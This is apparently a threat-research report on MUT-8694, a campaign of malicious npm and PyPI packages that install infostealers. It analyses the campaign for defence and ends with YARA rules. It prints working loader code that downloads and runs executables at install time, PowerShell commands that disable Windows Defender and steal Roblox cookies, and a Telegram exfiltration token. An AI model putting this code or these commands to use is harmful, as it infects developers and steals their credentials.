MUT-8694: An NPM and PyPI Malicious Campaign Targeting Windows Users

Key points and observations

• Datadog Security Research has discovered an ongoing supply chain attack targeting both the npm and PyPi package repositories.
• This is the first time we have observed the same threat actor targeting two different package ecosystems.
• Datadog is tracking this cluster of threat activity as MUT-8694.
• MUT-8694 uses a series of malicious packages to deliver infostealer malware to Windows users, and makes use of legitimate services, such as GitHub and repl.it, to host additional payloads.
• Based on the type of malware delivered and types of packages used, we have identified overlap in MUT-8694 with a similar campaign that researchers at Socket described

Overview

Datadog’s CLI tool GuardDog is designed to detect malicious packages across PyPI, npm, and Go modules. On October 10 it identified a new threat within the PyPI ecosystem.

The package was named larpexodus (version 0.1), and on investigation was found to execute a PowerShell command that downloaded and executed a Windows PE32 binary from github[.]com/holdthaw/main/CBLines.exe. Analysis of the binary confirmed it was infostealer malware, referred to as Blank Grabber, compiled from an open source project hosted on Github. Exploration of the GitHub repository revealed another commodity stealer sample, this time compiled from the open source Skuld Stealer project.

After further analysis of our dataset, we found the same binary downloader in multiple packages hosted on npm, indicating a broader campaign involving multiple package ecosystems. The malicious packages on both npm and PyPi masquerade as legitimate packages, often through the use of typosquatting.

Datadog is tracking this cluster of threat activity as MUT-8694. We use the MUT (mysterious unattributed threat) designation to track clusters unattributed to a known threat actor. The use of numerous packages and involvement of several malicious users suggests MUT-8694 is persistent in their attempts to compromise developers.

Discovery

On October 10, 2024, a malicious package with the name larpexodus was uploaded to PyPI. This package triggered a GuardDog alert, indicating that the code downloads and executes an externally hosted Windows binary, a method frequently used by malware. GuardDog designated the package as malicious and we began to analyze its contents.
Below is the breakdown of the larpexodus package’s components:

Package Metadata

• Name: larpexodus
• Version: 0.1
• Date Published: October 10, 2024
• Description: Empty
• Initial execution: Custom installation code that is defined by a cmdclass setting in setup.py.

In the days following this, GuardDog alerted us to additional malicious PyPI packages, which we were able to attribute to the same threat actor. The packages all contained the same code acting as a loader for the infostealer samples described above.

We noticed that the PyPI package descriptions often suggested that the library was designed to resolve DLL- and API-related problems. Some packages had references to MuMu Player, an emulator used for playing games on Android phones and Apple silicon–based Macs, and others had references to Solara, a Python web application framework.

Given the above, we have assessed with high confidence that MUT-8649 intends to target developers with this malware. That said, the PyPi packages did not appear to target developers of a particular stack or application. We discovered a total of 42 malicious packages related to this campaign in PyPi.

After the initial discovery, GuardDog continued generating similar alerts, this time for packages that were labeled nodelogic and uploaded to the npm ecosystem.
Below is the breakdown of the nodelogic package’s components:

Package Metadata

• Name: nodelogic
• Version: 1.0.0
• Date Published: October 16, 2024
• Description: Advanced package used for easy API/DLL repair of any software.
• Initial execution: A post-installation hook that executes an obfuscated JavaScript version of the same attack method.

We analyzed the code within the flagged npm packages and discovered that the malware was also retrieving the aforementioned infostealers from GitHub and repl.it, but this time the samples themselves were highly obfuscated. This led us to believe that we were dealing with a much bigger campaign than previously thought, and that MUT-8694 was coordinating a larger supply chain attack across multiple package ecosystems.

Contrary to the PyPI ecosystem, most of the npm packages had references to Roblox, an online game creation platform, suggesting that the threat actor is targeting Roblox developers in particular. We discovered a total of 18 npm packages, details of which can be found in the Indicators of Compromise section.

Technical analysis

Initial access and execution

As described previously, MUT-8694 hosts several malicious packages in both the npm and PyPi package ecosystems. Initial access is achieved when nodeJS or Python developers retrieve one of these malicious packages using the npm or pip commands respectively. Once the malicious package is retrieved, obfuscated code within the package is automatically executed. This code fetches the infostealer payloads from a number of different locations, depending on the package in question.

For the npm packages, the loader code is contained within the package’s index.js file and is obfuscated with the popular open source obfuscator obfuscator.io. This obfuscator has several features designed to hinder analysis, including variable obfuscation, debug protection, dead code injection, and control flow flattening. Fortunately, the code can be easily deobfuscated using freely available tools.

A truncated example of the obfuscated code can be seen below:

const _0x48032e=_0x580a;(function(_0x17cd22,_0x1f7608){const _0x1e262d=_0x580a,_0x64a58c=_0x17cd22();while(!![]){try{const _0x50782e=-parseInt(_0x1e262d(0xd3))/(0xc33*-0x1+-0xd2f+-0x61*-0x43)+-parseInt(_0x1e262d(0xca))/(0xe*-0xad+-0x1d92+0x270a)+parseInt(_0x1e262d(0xef))/(-0x1fdd*-0x1+-0x499+-0x1b41)*(parseInt(_0x1e262d(0xdd))/(-0x8*0x3af+-0x7f7+-0x1*-0x2573))+-parseInt(_0x1e262d(0xd5))/(0x6b4+-0x4c0+-0x1ef*0x1)+-parseInt(_0x1e262d(0xee))/(-0x1131+0x1478+-0x77*0x7)*(parseInt(_0x1e262d(0xec))/(-0x1*-0x10af+0x257+0x1*-0x12ff))+-parseInt(_0x1e262d(0xce))/(-0x40f*0x7+-0xf78+0x4e1*0x9)*(-parseInt(_0x1e262d(0xc7))/(-0x173e+-0xa5*-0xd+0x2*0x773))+parseInt(_0x1e262d(0xe9))/(0x1a45+0x1d56+-0x3791)*(parseInt(_0x1e262d(0xed))/(0x3a7+-0x1e59+-0x1*-0x1abd));if(_0x50782e===_0x1f7608)break
…

After deobfuscating and prettifying the output, the functionality is evident. The malware first defines two GitHub URLs hosting additional binary payloads. A PowerShell command is then invoked to retrieve those payloads and save them to the current working directory (the directory of the package itself). Another PowerShell command is invoked to actually execute the binary.

const path = require("path");
const urls = ["https[://]github.com/holdthatcode/e/raw/main/CBLines.exe", "https[://]github.com/holdthatcode/e/raw/main/LoPi.exe"];
const outputFiles = [path.join(__dirname, "CBLines.exe"), path.join(__dirname, "LoPi.exe")];
function downloadAndRun(uri, binaryPath) {
  const psh_retrieve_payload = "powershell -Command \"Invoke-WebRequest -Uri '" + uri + "' -OutFile '" + binaryPath + "'\"";
  const psh_execute_payload = "powershell -Command \"Start-Process '" + binaryPath + "'\"";
  exec(psh_retrieve_payload, (error, uri, binaryPath) => {
    if (error) {
      console.error("Download error: " + error.message);
      return;
    }
    console.log("Downloaded " + binaryPath + " successfully");
    exec(psh_execute_payload, (error, uri, binaryPath) => {
      if (error) {
        console.error("Execution error: " + error.message);
        return;
      }
      console.log("Executed " + binaryPath + " successfully");
    });
  });
}
urls.forEach((url, path) => {
  downloadAndRun(url, outputFiles[path]);
});

Pseudocode demonstrating logic to retrieve additional payloads

The attacker has neglected to suppress console output for this procedure, resulting in log statements being written when the download succeeds or fails. This could be used as an indicator to potentially alert victims to the payload retrieval.

The Python packages follow a similar procedure to the one described above. Code within the setup.py script for each package invokes PowerShell and uses the same commands seen previously to retrieve and execute the infostealer malware.

Unlike their npm counterparts, loader scripts within the Python packages aren’t obfuscated. This makes it much easier to determine the functionality and identify the package as malicious. It’s unclear why the developer didn’t implement this feature for the Python packages when they did for the npm ones.

class CustomInstallCommand(install):
    """Custom installation script."""
    def run(self):
        output_file = os.path.join(os.getcwd(), "CBLines.exe")
        
        # Step 1: Download the file using PowerShell's Invoke-WebRequest
        download_command = f"powershell -Command \"Invoke-WebRequest -Uri 'https://github.com/holdthatcode/e/raw/main/CBLines.exe' -OutFile '{output_file}'\""
        download_result = subprocess.run(download_command, shell=True, text=True)

        if download_result.returncode == 0 and os.path.exists(output_file):
            print("Download successful. Now opening the file...")

            # Step 2: Use Start-Process to open the downloaded MP3 file
            open_command = f"powershell -Command \"Start-Process '{output_file}'\""
            open_result = subprocess.run(open_command, shell=True, text=True)

            print("Open Output:", open_result.stdout)
            print("Open Error:", open_result.stderr)
        else:
            print("File download failed or file not found.")

        # Call the standard install
        install.run(self)

Python loader code from larpexodus package

Actions on objective

As previously mentioned, the primary objective of the malicious packages is to retrieve infostealer malware. Of all the packages we have triaged, two malicious binaries have been discovered. These binaries are compiled from code taken from two open source projects: Blank Grabber and Skuld Stealer.

Blank Grabber

In the npm and PyPi packages described above, Blank Grabber is delivered as a PE32 executable hosted on GitHub with the name CBLines.exe. The executable consists of Python code compiled using PyInstaller, and the name of the sample differs across packages. We’ve included a summary of the discovered names in the Indicators of Compromise section.

The README page for Blank Grabber's GitHub repository suggests that the malware has some evasion capabilities, along with stealer code that targets Roblox cookies, crypto wallets, browser passwords, Telegram sessions, and more. The developers also claim that the malware can capture screenshots and webcam images and that all of this data can be exfiltrated via Discord webhooks or a Telegram bot.

After execution, the malware copies itself to the user’s Temp directory (%AppData%\Local\Temp\) before re-executing itself. The malware will then execute the following PowerShell command:

C:\WINDOWS\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\<user>\AppData\Local\Temp\CBLines.exe'"

This command adds the malware’s executable to the Windows Defender exclusion list, preventing the EDR from scanning the file and identifying it as malware.

A request is then made to the ip-api.com service to retrieve and store information about the victim’s public IP address. This includes geolocation of the IP and a reverse DNS lookup of the IP itself.

{
  "status": "success",
  "country": "United Kingdom",
  "regionName": "England",
  "timezone": "Europe/London",
  "reverse": "<redacted>",
  "mobile": false,
  "proxy": false,
  "query": "<IP address>"
}

Sample response from ip-api.com

After this has completed, another PowerShell command is used to disable more Windows Defender features:

C:\WINDOWS\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

This includes the following:

The malware also removes the definitions file used by Defender, via the MpCmdRun.exe command line utility, before executing the following system enumeration commands:

After completing this enumeration, Blank Grabber proceeds to the stealer functionality of the code. Since the code is modular and open source, the operator of the malware can configure its functionality to suit their campaign.

In the sample we analyzed, MUT-8694 specifically targets Roblox browser cookies. This is achieved by reading the contents of a specific registry location using the following PowerShell command:

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

Similar commands are used to retrieve the contents of the clipboard and a copy of the Windows product key. True to the functionality described on GitHub, Blank Grabber also has the ability to take screenshots on the host. The malware uses PowerShell to execute a base64 encoded payload, using the -EncodedCommand parameter. The decoded code takes a screenshot of all attached desktops and saves a PNG image of each to the current working directory.

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIA…=
PowerShell command to execute screenshotting code

In addition to this, the sample we analyzed gathered files from the user's Desktop, Documents, Downloads, and Pictures folders, along with cookies and history from the Edge web browser, before bundling all of this data into a password-protected RAR archive for exfiltration. The following command was used to achieve this:

"C:\Users\admin\AppData\Local\Temp\_MEI52842\rar.exe a -r -hp"blank" "C:\Users\admin\AppData\Local\Temp\ffzEL.zip" *

The resulting RAR archive is exfiltrated via a Telegram bot using the name “blvnkbot” with a token of bot7546407054:AAGwtti94gRjmoXnuSTcg7u0_qsGj7uoXqo. More details of this can be found in the Indicators of Compromise section.

Skuld Stealer

Similar to Blank Grabber, Skuld Stealer has a modular architecture, but it is written in Go and targets Discord users on Windows. According to its GitHub repository, the malware has several features that make it effective as a stealer. These include mechanisms to evade Windows Defender, detect whether it’s running in a virtual machine, and persist itself as a startup item.

Skuld Stealer begins by defining a user-generated Discord webhook URL, used for exfiltration of any credentials the malware gathers.

Within the Discord webhook URL is a Snowflake identifier, which uniquely identifies resources on Discord. Using an online decoder, we can extract a timestamp from this identifier that tells us when the webhook URL was created:

This creation date is around the same time as we started to receive GuardDog alerts about this campaign.

Examining the rest of the malware’s main function in our disassembler shows us which modules MUT-8694 has opted to include in their build of the stealer. These are summarized in the table below.

How Datadog can help

Datadog Software Composition Analysis (SCA) customers can easily verify if this package is installed in their infrastructure by running this query in the Library Risks explorer.

If you discover your system is impacted, consider what credentials and underlying infrastructure could be affected. It is important to take immediate measures such as rotating credentials, isolating the application, and investigating potential spread.

We also published the packages to our open-source malicious package dataset.

Detection Opportunities with YARA

We are sharing two YARA rules that can be used to detect similar npm and PyPI packages based on telegram exfiltration and obfuscation behaviours

rule HUNT_FILE_Telegram_Bot_API_Commands
{
    meta:
        description = "Detects Telegram bot API commands"
        author = "Andy Giron, Datadog"
        date = 11/20/2024

    strings:
        $telegram_api_base = "https://api.telegram.org/bot" ascii
        $token_pattern = /[0-9]{7,10}:[A-Za-z0-9_-]{35}/  


        $command_getMe = "/getMe" ascii
        $command_getUpdates = "/getUpdates" ascii
        $command_getWebhookInfo = "/getWebhookInfo" ascii
        $command_deleteWebhook = "/deleteWebhook" ascii
        $command_drop_updates = "/deleteWebhook?drop_pending_updates=true" ascii

        $identifier_chat_id = "chat_id" ascii

    condition:
        1 of ($telegram_api_base, $token_pattern) and 1 of ($command_getMe, $command_getUpdates, $command_getWebhookInfo, $command_deleteWebhook, $command_drop_updates, $identifier_chat_id)
}

rule HUNT_FILE_Obfuscation_JS_HexFunctionPattern
{
    meta:
        description = "Detects JavaScript obfuscation patterns involving hex functions and array manipulation in obfuscated code"
        author = "Andy Giron, Datadog"
        date = 11/20/2024

    strings:
        $obfuscation_pattern = /\(?function\s*_?0x[0-9a-fA-F]{1,8}\(/ ascii

        $array_push = /\['push'\]/ ascii
        $array_shift = /\['shift'\]/ ascii
        $hex_array = /\[0x[0-9a-fA-F]{2,8}(,0x[0-9a-fA-F]{2,8}){10,}\]/ ascii

    condition:
        $obfuscation_pattern and
        (1 of ($array_push, $array_shift, $hex_array))
}

Conclusion

In conclusion, MUT-8694 is a persistent threat actor with the ability to orchestrate a coordinated supply chain attack across both npm and PyPi ecosystems. This extensive operation underscores the ongoing risk that threat actors pose to open source package repositories, highlighting the importance of robust security measures among developers using these ecosystems.

Our findings indicate the involvement of a single threat actor exploiting multiple platforms with similar techniques, such as typosquatting and leveraging legitimate services like GitHub for hosting malicious payloads. The repeated use of obfuscation and the employment of both publicly available infostealers—Blank Grabber and Skuld Stealer—illustrate the adaptability and persistence of this threat actor, as well as their focus on targeting gaming communities and Discord users for credential theft and crypto-related exploits.

As we continue to track this threat actor, we aim to shed more light on the tactics, techniques, and procedures (TTPs) of MUT-8694, highlighting the ongoing threat to supply chain security.

Indicators of Compromise

Files

URLs

Malicious Packages